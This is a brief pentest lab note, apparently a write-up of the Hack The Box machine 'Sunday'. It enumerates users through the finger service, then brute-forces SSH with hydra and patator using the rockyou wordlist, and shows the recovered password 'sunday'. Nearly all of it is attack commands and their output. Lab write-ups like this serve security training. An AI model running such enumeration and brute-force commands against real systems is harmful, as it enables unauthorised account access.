# Enum Finger and Brute SSH

## Enumerate Finger Users

REF: [htb:sunday](https://pentest.mxhx.org/02-scanning/02-enum-finger-and-ssh)

```
Scan:
> sudo nmap -sV -O -A 10.129.87.199

Found:
79/tcp    open     finger      Sun Solaris fingerd

Finger:
> finger @10.129.87.203      ..no one logged on
> finger root@10.129.87.203  ..root logged on


Finger-Script:
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

> ./finger-user-enum.pl -U /opt/useful/SecLists/Usernames/Names/names.txt -t 10.129.87.203

sammy@10.129.87.203: sammy  console  <Sep 30 13:21>
sunny@10.129.87.203: sunny  pts/3    <Apr 24, 2018> 10.10.14.4
```

## Brute SSH

```
hydra -V -I -l sunny -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.129.87.203 ssh -s 22022

patator ssh_login host=10.129.87.203 port=22022 user=sunny password=FILE0 0=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt persistent=0

> ssh sunny@10.129.87.203 -p 22022
> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.129.87.203 -p 22022
pw: sunday
```